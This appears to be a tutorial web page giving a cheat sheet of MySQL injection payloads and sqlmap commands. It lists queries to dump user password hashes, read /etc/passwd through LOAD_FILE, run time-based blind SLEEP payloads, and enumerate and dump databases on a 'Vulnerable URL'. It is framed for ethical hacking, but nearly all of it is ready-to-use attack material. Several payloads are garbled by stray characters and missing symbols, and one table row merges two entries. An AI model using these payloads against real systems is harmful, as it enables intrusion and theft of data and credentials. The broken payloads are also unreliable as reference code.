Skip to content
Related Articles

Related Articles

SQL Injection Cheat Sheet

View Discussion
Improve Article
Save Article
  • Last Updated : 02 Aug, 2022
View Discussion
Improve Article
Save Article

SQL injection is a common vulnerability in web applications that can be exploited to inject malicious SQL code into a database. An attacker who knows the correct syntax for injecting SQL commands into an application’s back end could use this to execute unauthorized or destructive actions on behalf of the target user. An ethical hacker should always test for and identify potential SQL injection vulnerabilities, as they are one of the most frequently used attacks in today’s digital world.

SQL Injection Cheat Sheet

 

The whole purpose of the Cheat Sheet is to provide you with some quick, accurate ready-to-use commands and necessary Sqlmap queries to help you with SQL Injections.

Basics of SQL: 

S. No.

Parameters

SQL Queries/Examples

1.

Version

SELECT @@version;

2.

Comments

/ / ou #

3.

Current user

SELECT user(); || SELECT system­_user()

4.

List users

SELECT user FROM mysql.u­ser;

5.

List password hashes

SELECT host, user, password FROM mysql.u­ser;

6.

Current Database

SELECT database()

7.

List databases

SELECT schema­_name FROM inform­ati­on_­sch­ema.sc­hemata; || SELECT distin­ct(db) FROM mysql.db

8.

List tables

SELECT table_­sch­ema­,ta­ble­_name FROM inform­ati­on_­sch­ema.tables WHERE table_­schema != ‘mysql’ AND table_­schema != ‘infor­mat­ion­_sc­hema’

9.

List columns

SELECT table_­schema, table_­name, column­_name FROM inform­ati­on_­sch­ema.co­lumns WHERE table_­schema != ‘mysql’ AND table_­schema != ‘infor­mat­ion­_sc­hema’

10.

Find Tables From Column Name

SELECT table_­schema, table_name FROM inform­ati­on_­sch­ema.co­lumns WHERE column­_name = ‘usern­ame’;

11.

Time delay

SELECT BENCHM­ARK­(10­000­00,­MD5­(‘A’)); SELECT SLEEP(5); # >= 5.0.12

12.

Local File Access

UNION ALL SELECT LOAD_F­ILE­(‘/­etc­/pa­sswd’) 

13.

Hostna­me/IP Address

SELECT @@host­name;

14.

Create user

CREATE USER test1 IDENTIFIED BY ‘pass1′;

15.

Delete user Location of the db file

SELECT @@datadir;

Basic Commands of SQLMap:

S. No

Parameters

SQLMap Queries Syntax

1.

To Attack a database of a Vulnerable Website

sqlmap -u “Vulnerable URL” -dbs

2.

To get tables from a database of Vulnerable Website

sqlmap -u “Vulnerable URL” -table -D [Name of database]

3.

To get columns of a table on the Vulnerable Website

sqlmap -u “Vulnerable URL” -columns -D [Name of database] -T [table name]

4.

To dump all values of the table of Vulnerable Website

sqlmap -u “Vulnerable URL” -dump -D [Name of database] -T [table name]

Manually Attacks on SQLMap:

S. No.Manually Attack ParametersSQLMap Queries/Examples
1.Quick detect INTEGERSselect 1 and row(1,­1)>­(select count(),conc­at(­CON­CAT­(@@­VER­SIO­N),­0x3­a,f­loo­r(r­and()2))x from (select 1 union select 2)a group by x limit 1))
2.Quick detect STRINGS‘+(select 1 and row(1,­1)>­(select count(),conc­at(­CON­CAT­(@@­VER­SIO­N),­0x3­a,f­loo­r(r­and()2))x from (select 1 union select 2)a group by x limit 1))+’
3.Clear SQL Testproduc­t.p­hp?id=4 produc­t.p­hp?­id=5-1 produc­t.p­hp?id=4 OR 1=1 produc­t.p­hp?­id=-1 OR 17-7=10
4.Blind SQL InjectionSLEEP(­25)– SELECT BENCHM­ARK­(10­000­00,­MD5­(‘A’));
5.Real world sampleProduc­tID=1 OR SLEEP(­25)=0 LIMIT 1– Produc­tID=1) OR SLEEP(­25)=0 LIMIT 1– Produc­tID=1′ OR SLEEP(­25)=0 LIMIT 1– Produc­tID=1′) OR SLEEP(­25)=0 LIMIT 1– Produc­tID=1)) OR SLEEP(­25)=0 LIMIT 1– Produc­tID­=SELECT SLEEP(­25)–

You can also learn more about SQL Injections from the article: How to use SQLMAP to test a website for SQL Injection vulnerability.


My Personal Notes arrow_drop_up
Recommended Articles
Page :

Start Your Coding Journey Now!